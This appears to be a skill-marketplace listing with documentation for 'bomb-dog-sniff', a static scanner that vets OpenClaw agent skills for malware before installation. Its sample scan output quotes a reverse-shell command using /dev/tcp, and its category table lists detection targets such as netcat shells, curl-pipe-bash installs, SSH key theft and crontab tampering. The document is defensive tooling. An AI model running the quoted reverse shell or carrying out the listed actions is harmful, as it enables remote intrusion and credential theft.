Tencent SkillHub · Security & Compliance

Bomb Dog Sniff

Security-first skill management for OpenClaw - like a bomb-sniffing dog for skills. Sniffs out malicious payloads (crypto stealers, keyloggers, reverse shells) before installation. Quarantine → Scan → Install only the safe ones.

skill openclawclawhub Free

0 Downloads

0 Stars

0 Installs

0 Score

High Signal

⬇ 0 downloads ★ 0 stars Unverified but indexed

Install for OpenClaw

Quick setup

Download the package from Yavira.
Extract the archive and review SKILL.md first.
Import or place the package into your OpenClaw setup.

Requirements

Target platform: OpenClaw
Install method: Manual import
Extraction: Extract archive
Prerequisites: OpenClaw
Primary doc: SKILL.md

Package facts

Download mode: Yavira redirect
Package format: ZIP package
Source platform: Tencent SkillHub
What's included: .guardianrc.example.json, PERFECTION_SUMMARY.md, SKILL.md, package.json, patterns.js, safe-download.js

Validation

Use the Yavira download entry.
Review SKILL.md after the package is downloaded.
Confirm the extracted package contains the expected setup assets.

Install with your agent

Agent handoff

Hand the extracted package to your coding agent with a concrete install brief instead of figuring it out manually.

Download the package from Yavira.
Extract it into a folder your agent can access.
Paste one of the prompts below and point your agent at the extracted folder.

New install

I downloaded a skill package from Yavira. Read SKILL.md from the extracted folder and install it by following the included instructions. Tell me what you changed and call out any manual steps you could not complete.

Upgrade existing

I downloaded an updated skill package from Yavira. Read SKILL.md from the extracted folder, compare it with my current installation, and upgrade it while preserving any custom configuration unless the package docs explicitly say otherwise. Summarize what changed and any follow-up checks I should run.

Open Send to Agent page Open JSON manifest Open Markdown brief

Trust & source

Release facts

Source: Tencent SkillHub
Verification: Indexed source record
Version: 0.1.0

Provenance

Publisher: LvcidPsyche
Source page: View original listing
Canonical URL: Open canonical page

Documentation

ClawHub primary doc Primary doc: SKILL.md 26 sections Open source page

bomb-dog-sniff v1.2.0 🐕

Like a bomb-sniffing dog for OpenClaw skills Sniff out malicious skills before they explode in your system. Quarantine → Scan → Install only the safe ones.

Security Hardening

Fixed command injection vulnerabilities in download functions Added path traversal protection - Sanitizes all path inputs Secure quarantine - Randomized directory names with restricted permissions Binary file detection - Skips binary files to avoid false positives File size limits - Prevents DoS via huge files ReDoS protection - Limits regex processing on long lines

Detection Improvements

Smart false positive reduction - Better context-aware pattern matching Entropy analysis - Detects encoded/encrypted payloads Test file awareness - Reduces severity for findings in test files Confidence scoring - Each finding has confidence level (high/medium/low) 13 detection categories - Added supply chain, prototype pollution, and malicious script detection

New Patterns

Supply chain attack indicators (typosquatting, dynamic requires) Prototype pollution vulnerabilities Malicious npm/yarn scripts Browser credential theft SSH key theft Systemd persistence mechanisms

Quick Start

# Sniff out threats before installing openclaw skill bomb-dog-sniff scan ./downloaded-skill # Safe install from clawhub (auto-downloads, sniffs, installs if clean) openclaw skill bomb-dog-sniff safe-install cool-skill # Audit an already-installed skill openclaw skill bomb-dog-sniff audit bird # Batch scan multiple skills openclaw skill bomb-dog-sniff batch skills-to-audit.txt

scan

Scan a skill directory for malicious patterns. openclaw skill bomb-dog-sniff scan <path> [options] Options: -j, --json Output JSON only -v, --verbose Show detailed findings -t, --threshold N Set risk threshold (default: 40) -h, --help Show help Example: openclaw skill bomb-dog-sniff scan ./untrusted-skill openclaw skill bomb-dog-sniff scan -j ./untrusted-skill > report.json Output: 🔍 Bomb-Dog-Sniff Security Scanner v1.2.0 Target: /home/user/skills/untrusted-skill 🔴 CRITICAL (2) ────────────────────────────────────────────────── crypto_harvester: scripts/wallet.js:23 Crypto wallet private key harvesting detected Code: const privateKey = "a1b2c3..." Confidence: high reverse_shell: scripts/backdoor.sh:5 Reverse shell or remote code execution detected Code: bash -i >& /dev/tcp/192.168.1.100/4444 Confidence: high 🟠 HIGH (1) ────────────────────────────────────────────────── pipe_bash: install.sh:12 Dangerous curl | bash pattern detected Confidence: high ═══════════════════════════════════════════════════ SCAN SUMMARY ═══════════════════════════════════════════════════ ☠️ Risk Score: 75/100 Risk Level: MALICIOUS Duration: 125ms Files Scanned: 12/15 Files Skipped: 3 (binary/empty/large) Findings: 3 Severity Breakdown: 🔴 CRITICAL: 2 🟠 HIGH: 1 📋 Recommendation: MALICIOUS - Do not install. Found 3 critical security issues. Scan ID: bds-20260208-a1b2c3d4

safe-install

Download from clawhub/GitHub, scan, and install only if safe. openclaw skill bomb-dog-sniff safe-install <source> [options] Source: - ClawHub skill name: bird - GitHub URL: https://github.com/user/skill - Local path: ./local-skill Options: --threshold N Set risk threshold (default: 39) --dry-run Scan only, don't install --verbose Show all findings Example: # Install with default threshold (39) openclaw skill bomb-dog-sniff safe-install bird # Stricter threshold openclaw skill bomb-dog-sniff safe-install cool-skill --threshold 20 # Scan only (dry run) openclaw skill bomb-dog-sniff safe-install unknown-skill --dry-run # GitHub source openclaw skill bomb-dog-sniff safe-install https://github.com/user/cool-skill

audit

Audit an already-installed skill. openclaw skill bomb-dog-sniff audit <skill-name> [options] Example: openclaw skill bomb-dog-sniff audit notion

batch

Scan multiple skills from a list file. openclaw skill bomb-dog-sniff batch <list-file> Example list file (skills.txt): # My installed skills to audit bird notion gog slack ./custom-skill # Commented lines are ignored # old-skill Run: openclaw skill bomb-dog-sniff batch skills.txt

Detection Categories

bomb-dog-sniff scans for these threat categories: CategorySeverityExamples Detectedcrypto_harvesterCRITICALPrivate key extraction, wallet exports, mnemonic theftcredential_theftCRITICALEnvironment variable exfiltration, config file theft, SSH key theftreverse_shellCRITICALNetcat shells, /dev/tcp/ redirects, socket-based shells, eval of remote codekeyloggerCRITICALKeyboard capture with exfiltration, clipboard theft, password field monitoringencoded_payloadHIGHBase64 execution chains, hex escapes with eval context, obfuscated codesuspicious_apiHIGHPastebin/ngrok/webhook destinations, dynamic URL construction with secretspipe_bashHIGHcurl | bash, wget | sh patternsdeposit_scamHIGH"Send ETH to 0x...", payment prompts in unexpected contextssupply_chainHIGHTyposquatting, dynamic requires, suspicious postinstall scriptsprototype_pollutionHIGHDangerous object merging, __proto__ manipulationmalicious_scriptCRITICALPre/postinstall doing network/exec operations, modifying other packagesnetwork_exfilMEDIUMFile reading followed by network transmissionfile_tamperCRITICAL.bashrc modification, crontab editing, SSH authorized_keys manipulation

Risk Scoring

0-19 SAFE ✅ Install freely 20-39 LOW ⚠️ Review recommended 40-69 SUSPICIOUS 🚫 Blocked by default 70-100 MALICIOUS ☠️ Never install Each finding adds to the score: CRITICAL: +25 points (× confidence multiplier) HIGH: +15 points (× confidence multiplier) MEDIUM: +5 points (× confidence multiplier) Confidence multipliers: High confidence: 1.0× Medium confidence: 0.75× Low confidence: 0.5× Score caps at 100.

Safe Install Process

1. QUARANTINE └── Skill downloaded to /tmp/bds-q-<random>/ └── Randomized, non-predictable directory name └── Restricted permissions (0o700) 2. SCAN ├── Check all files against detection patterns ├── Skip binary files, empty files, files >10MB ├── Calculate entropy for encoded payload detection ├── Apply confidence multipliers └── Generate findings report 3. DECISION ├── Risk > threshold? → BLOCK & DELETE └── Risk ≤ threshold? → PROCEED 4. INSTALL (if passed) └── Move from quarantine to skills directory └── Backup existing installation (max 5 backups) 5. CLEANUP └── Securely remove quarantine directory

Scanning Details

Static analysis only - No code execution Multi-pattern matching - 60+ detection patterns Line-level reporting - Exact file:line for each finding False positive reduction - Context-aware pattern matching Binary detection - Automatically skips binary files Symlink loop protection - Tracks visited inodes Depth limiting - Max 20 directory levels Test file handling - Reduces severity for test files

Environment Variables

# Set custom skills directory export OPENCLAW_SKILLS_DIR=/path/to/skills # Set default risk threshold export BOMB_DOG_THRESHOLD=25

Per-Skill Configuration

Add to your skill's package.json: { "bomb-dog-sniff": { "riskThreshold": 25, "excludedCategories": ["network_exfil"] } }

CI/CD Integration

Add to your CI pipeline: # .github/workflows/skill-security.yml name: Skill Security Scan on: [push, pull_request] jobs: scan: runs-on: ubuntu-latest steps: - uses: actions/checkout@v3 - name: Scan skills run: | for skill in skills/*/; do echo "Scanning $skill" node skills/bomb-dog-sniff/scan.js "$skill" || exit 1 done Exit codes: 0 - Safe (score below threshold) 1 - Error/invalid arguments 2 - Risky (score ≥ threshold)

Programmatic API

const { scanSkill } = require('./scan'); const { safeDownload } = require('./safe-download'); // Scan a skill const report = scanSkill('./path/to/skill', { verbose: true }); console.log(`Risk score: ${report.riskScore}`); console.log(`Findings: ${report.findings.length}`); // Safe download and install const result = await safeDownload('cool-skill', { autoInstall: true, riskThreshold: 30, }); if (!result.success) { console.error('Installation blocked:', result.reason); }

Security Limits

To prevent DoS and ensure scanner security: LimitValuePurposeMax file size10MBPrevent memory exhaustionMax line length10KBPrevent ReDoS attacksMax files per scan10,000Prevent resource exhaustionMax findings per file100Prevent output floodingMax total findings500Prevent result floodingMax directory depth20Prevent infinite recursionDownload timeout2 minutesPrevent hanging downloadsMax download size50MBPrevent disk exhaustion

False Positives

If legitimate code triggers a warning: Check confidence level - Low confidence findings are more likely to be false positives Review the excerpt - Look at the actual code flagged Test files are noted - Findings in *.test.js or __tests__/ have reduced severity Comments are generally skipped - Unless they contain suspicious keywords To report false positives, please include: The file content that triggered the false positive The pattern category that matched Expected behavior

Best Practices

Always scan before installing unknown skills Use --dry-run first for untrusted sources Set lower threshold (--threshold 20) for critical systems Audit regularly - Rescan installed skills periodically Review CRITICAL findings - Never ignore critical severity warnings Check confidence levels - High confidence = higher priority

Files

SKILL.md - This documentation scan.js - Core scanner engine patterns.js - Detection pattern definitions safe-download.js - Safe download & install logic scripts/sniff.sh - CLI wrapper package.json - Package configuration QUICKSTART.md - Quick reference guide

Security Notes

⚠️ Limitations: Static analysis only (some obfuscation may evade detection) Pattern-based (novel attacks may not be detected) Not a replacement for manual code review on critical systems Cannot detect runtime-only malicious behavior ✅ Recommendations: Use bomb-dog-sniff as first line of defense Review code manually for high-security environments Keep patterns.js updated with new threat signatures Report false positives and missed detections Combine with other security tools for defense in depth

v1.2.0 (Hardened Edition)

SECURITY: Fixed command injection vulnerabilities in safe-download.js SECURITY: Added path traversal protection SECURITY: Secure randomized quarantine directories FEATURE: Binary file detection and skipping FEATURE: File size limits (10MB per file, 50MB download) FEATURE: Entropy analysis for encoded payload detection FEATURE: Confidence scoring for all findings FEATURE: Test file awareness with severity reduction FEATURE: 3 new detection categories (supply_chain, prototype_pollution, malicious_script) IMPROVEMENT: Better false positive reduction with context-aware matching IMPROVEMENT: ReDoS protection via line length limits IMPROVEMENT: Symlink loop protection IMPROVEMENT: Backup rotation (max 5 backups)

v1.1.0

Added safe-install command with quarantine workflow Added audit command for installed skills Added batch command for multiple skill scanning Enhanced detection patterns (50+ signatures) Added risk threshold configuration

v1.0.0

Initial release with basic scanning 10 detection categories JSON output format

License

MIT - See LICENSE file Stay safe. Scan everything. Trust verified skills only. 🦞🐕

Category context

Identity, auth, scanning, governance, audit, and operational guardrails.

Source: Tencent SkillHub

Largest current source with strong distribution and engagement signals.

Package contents

Included in package

2 Docs2 Scripts2 Config

SKILL.md Primary doc
PERFECTION_SUMMARY.md Docs
patterns.js Scripts
safe-download.js Scripts
.guardianrc.example.json Config
package.json Config